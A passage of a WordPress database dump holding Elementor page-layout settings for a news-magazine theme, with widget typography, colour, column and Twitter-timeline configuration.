",\"typhography_title_post_list_1_hov_color\":\"#aaaaaa\",\"post_list_1_title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_font_size\":{\"unit\":\"px\",\"size\":\"14\"},\"post_list_1_title_font_size_tablet\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_size_mobile\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_weight\":\"700\",\"post_list_1_title_font_weight_tablet\":\"600\",\"post_list_1_title_font_weight_mobile\":\"600\",\"use_meta_post_list_1\":\"\",\"post_list1_meta_title_hov_color\":\"#aaaaaa\",\"post_list_1_meta_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_weight_tablet\":\"600\",\"post_list_1_meta_font_weight_mobile\":\"600\",\"use_excerpt_post_list_1\":\"\",\"post_list_1_excerpt_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_word\":\"10\",\"use_read_more_post_list_1\":\"\",\"post_list1_read_more_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_font_size\":{\"unit\":\"px\",\"size\":\"15\"},\"post_list1_read_more_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_weight_tablet\":\"400\",\"post_list1_read_more_font_weight_mobile\":\"400\",\"section_magzma_post_list_1_column_control\":\"\",\"horizontal_use\":\"left\",\"width\":\"600\",\"height\":\"395\",\"horizontal_col_select\":\"column-2\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"use_padding\":\"use\",\"padding_size_list_style_1\":{\"unit\":\"px\",\"size\":\"10\"},\"padding_size_list_style_1_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_list_style_1_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_post_list_animation_control\":\"\",\"animate\":\"fadeIn\",\"_section_style\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"-15\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-post-list-1\"},{\"id\":\"g7mt24q\",\"elType\":\"widget\",\"settings\":{\"title\":\"\",\"size\":\"small\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0qdx6b8\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"tatpigw\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"cfab1ec\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"3\",\"category\":[\"2\"]},\"elements\":[],\"widgetType\":\"magzma-masonry-post-1\"}],\"isInner\":false}],\"isInner\":false}]'),(1212,440,'_elementor_version','0.4'),(1213,440,'_elementor_css','a:3:{s:4:\"time\";i:1508883234;s:5:\"fonts\";a:0:{}s:6:\"status\";s:4:\"file\";}'),(1217,2,'_elementor_data','[{\"id\":\"gmwrczs\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\"},\"elements\":[{\"id\":\"5wcijtz\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"8qgudh6\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"6\",\"category\":[\"3\"],\"category_border_color\":\"#4a00b4\",\"title_font_size\":{\"unit\":\"px\",\"size\":14},\"use_excerpt\":\"\",\"button_bg_color\":\"#4a00b4\"},\"elements\":[],\"widgetType\":\"magzma-masonry-post-1\"}],\"isInner\":false},{\"id\":\"q9jlzjp\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7ziad57\",\"elType\":\"widget\",\"settings\":{\"wp\":{\"title\":\"\",\"twitter_timeline_type\":\"username\",\"twitter_widget_username\":\"Gn_innovations\",\"twitter_widget_id\":\"\",\"twitter_widget_width\":\"\",\"twitter_widget_height\":\"\",\"twitter_widget_tweet_limit\":\"\",\"twitter_widget_theme\":\"light\",\"twitter_widget_link_color\":\"#3b94d9\",\"twitter_widget_border_color\":\"#f5f5f5\"}},\"elements\":[],\"widgetType\":\"wp-widget-do-etfw\"}],\"isInner\":false}],\"isInner\":false}]'),(1218,442,'_elementor_edit_mode','builder'),(1219,442,'_elementor_data','[{\"id\":\"u1tc392\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"vghfmaj\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"gysyscs\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"6\",\"category\":[\"3\"]},\"elements\":[],\"widgetType\":\"magzma-masonry-post-1\"}],\"isInner\":false}],\"isInner\":false}]'),(1220,2,'_elementor_version','0.4'),(1222,378,'_elementor_edit_mode','builder'),(1225,411,'post_views_count','78'),(1226,378,'_elementor_data','[{\"id\":\"ixiyn7h\",\"elType\":\"section\",\"settings\":{\"gap\":\"extended\",\"structure\":\"22\"},\"elements\":[{\"id\":\"vzzha0l\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"rnv8c37\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"6\",\"category\":[\"2\"],\"category_border_color\":\"#23a455\",\"title_font_size\":{\"unit\":\"px\",\"size\":14},\"use_excerpt\":\"\",\"button_bg_color\":\"#23a455\"},\"elements\":[],\"widgetType\":\"magzma-masonry-post-1\"}],\"isInner\":false},{\"id\":\"luwf0d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"48vhr8l\",\"elType\":\"widget\",\"settings\":{\"wp\":{\"title\":\"Follow me on Twitter\",\"twitter_timeline_type\":\"username\",\"twitter_widget_username\":\"Gn_innovations\",\"twitter_widget_id\":\"\",\"twitter_widget_width\":\"\",\"twitter_widget_height\":\"400\",\"twitter_widget_tweet_limit\":\"\",\"twitter_widget_theme\":\"light\",\"twitter_widget_link_color\":\"#3b94d9\",\"twitter_widget_border_color\":\"#f5f5f5\"}},\"elements\":[],\"widgetType\":\"wp-widget-do-etfw\"}],\"isInner\":false}],\"isInner\":false}]'),(1227,444,'_elementor_edit_mode','builder'),(1228,444,'_elementor_css','a:4:{s:4:\"time\";i:1508892493;s:5:\"fonts\";a:0:{}s:6:\"status\";s:5:\"empty\";s:3:\"css\";s:0:\"\";}'),(1229,444,'_elementor_data','[{\"id\":\"cmkiwh2\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\"},\"elements\":[{\"id\":\"ml5koxa\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"xu0xnwk\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"100\",\"category\":[\"2\"],\"loop_infinite_class\":\"loop-infinte-list-1\",\"width\":\"600\",\"height\":\"600\"},\"elements\":[],\"widgetType\":\"magzma-post-list-1\"}],\"isInner\":false},{\"id\":\"pn9edz5\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(1230,378,'_elementor_version','0.4'),(1231,445,'_elementor_edit_mode','builder'),(1232,445,'_elementor_data','[{\"id\":\"cmkiwh2\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"ml5koxa\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"xu0xnwk\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"100\",\"category\":[\"2\"],\"loop_infinite_class\":\"loop-infinte-list-1\",\"width\":\"600\",\"height\":\"600\"},\"elements\":[],\"widgetType\":\"magzma-post-list-1\"}],\"isInner\":false}],\"isInner\":false}]'),(1233,445,'_elementor_version','0.4'),(1235,446,'_elementor_edit_mode','builder');
INSERT INTO `wpstg0_postmeta` VALUES (1236,446,'_elementor_data','[{\"id\":\"shulx0s\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\"},\"elements\":[{\"id\":\"hkgr41x\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"2vaavc4\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"\",\"category\":[\"2\"],\"loop_infinite_class\":\"loop-infinte-list-1\",\"width\":\"600\",\"height\":\"600\"},\"elements\":[],\"widgetType\":\"magzma-post-list-1\"}],\"isInner\":false},{\"id\":\"amtt9dp\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4k1c7ln\",\"elType\":\"widget\",\"settings\":{\"sidebar\":\"primary-sidebar\"},\"elements\":[],\"widgetType\":\"sidebar\"}],\"isInner\":false}],\"isInner\":false}]'),(1237,446,'_elementor_version','0.4'),(1238,446,'_elementor_css','a:3:{s:4:\"time\";i:1508892755;s:5:\"fonts\";a:0:{}s:6:\"status\";s:4:\"file\";}'),(1240,447,'_elementor_edit_mode','builder'),(1241,447,'_elementor_data','[{\"id\":\"ixiyn7h\",\"elType\":\"section\",\"settings\":{\"gap\":\"extended\",\"structure\":\"22\"},\"elements\":[{\"id\":\"vzzha0l\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"ngknvkp\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"\",\"category\":[\"2\"],\"loop_infinite_class\":\"loop-infinte-list-1\",\"width\":\"600\",\"height\":\"600\"},\"elements\":[],\"widgetType\":\"magzma-post-list-1\"}],\"isInner\":false},{\"id\":\"luwf0d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(1242,447,'_elementor_version','0.4'),(1243,447,'_elementor_css','a:3:{s:4:\"time\";i:1508892921;s:5:\"fonts\";a:0:{}s:6:\"status\";s:4:\"file\";}'),(1244,448,'_elementor_edit_mode','builder'),(1245,448,'_elementor_data','[{\"id\":\"ixiyn7h\",\"elType\":\"section\",\"settings\":{\"gap\":\"extended\",\"structure\":\"22\"},\"elements\":[{\"id\":\"vzzha0l\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"ngknvkp\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"\",\"category\":[\"2\"],\"loop_infinite_class\":\"loop-infinte-list-1\",\"width\":\"600\",\"height\":\"600\"},\"elements\":[],\"widgetType\":\"magzma-post-list-1\"}],\"isInner\":false},{\"id\":\"luwf0d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8508cfh\",\"elType\":\"widget\",\"settings\":{\"sidebar\":\"primary-sidebar\"},\"elements\":[],\"widgetType\":\"sidebar\"}],\"isInner\":false}],\"isInner\":false}]'),(1246,448,'_elementor_version','0.4'),(1248,449,'_elementor_edit_mode','builder'),(1249,449,'_elementor_data','[{\"id\":\"ixiyn7h\",\"elType\":\"section\",\"settings\":{\"gap\":\"extended\",\"structure\":\"22\"},\"elements\":[{\"id\":\"vzzha0l\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"ngknvkp\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"\",\"category\":[\"2\"],\"loop_infinite_class\":\"loop-infinte-list-1\",\"width\":\"600\",\"height\":\"600\"},\"elements\":[],\"widgetType\":\"magzma-post-list-1\"}],\"isInner\":false},{\"id\":\"luwf0d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8508cfh\",\"elType\":\"widget\",\"settings\":{\"sidebar\":\"primary-sidebar\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"34\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"sidebar\"}],\"isInner\":false}],\"isInner\":false}]'),(1250,449,'_elementor_version','0.4'),(1251,449,'_elementor_css','a:3:{s:4:\"time\";i:1508893039;s:5:\"fonts\";a:0:{}s:6:\"status\";s:4:\"file\";}'),(1253,450,'_elementor_edit_mode','builder'),(1254,450,'_elementor_data','[{\"id\":\"ixiyn7h\",\"elType\":\"section\",\"settings\":{\"gap\":\"extended\",\"structure\":\"22\"},\"elements\":[{\"id\":\"vzzha0l\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"ngknvkp\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"\",\"category\":[\"2\"],\"loop_infinite_class\":\"loop-infinte-list-1\",\"width\":\"600\",\"height\":\"600\"},\"elements\":[],\"widgetType\":\"magzma-post-list-1\"}],\"isInner\":false},{\"id\":\"luwf0d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8508cfh\",\"elType\":\"widget\",\"settings\":{\"sidebar\":\"primary-sidebar\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"34\",\"isLinked\":false},\"_background_background\":\"gradient\"},\"elements\":[],\"widgetType\":\"sidebar\"}],\"isInner\":false}],\"isInner\":false}]'),(1255,450,'_elementor_version','0.4'),(1256,450,'_elementor_css','a:3:{s:4:\"time\";i:1508893445;s:5:\"fonts\";a:0:{}s:6:\"status\";s:4:\"file\";}'),(1258,451,'_elementor_edit_mode','builder'),(1259,451,'_elementor_data','[{\"id\":\"cgfdli8\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"content_width\":{\"unit\":\"px\",\"size\":964},\"gap\":\"no\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"20\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"90zub0t\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"9wd6jr7\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"30\",\"section_sticky_element\":\"\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"so55224\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.961\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"gvq9sbs\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"3\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#4caf50\",\"category_bg_hover_color\":\"#4caf50\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"dghaq27\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"offset\":\"0\",\"category\":[\"1\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"56\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#266cc9\",\"category_bg_hover_color\":\"#266cc9\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"6uc2i0p\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"44.078\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"fb4g874\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"3\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"78.5\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"400\",\"height\":\"510\",\"category_bg_color\":\"#c9975f\",\"category_bg_hover_color\":\"#c9975f\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"48mal4x\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.960\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"x20xpc5\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"5\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#ea7441\",\"category_bg_hover_color\":\"#ea7441\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"y4m8rgg\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"6\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#e5e100\",\"category_bg_hover_color\":\"#e5e100\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"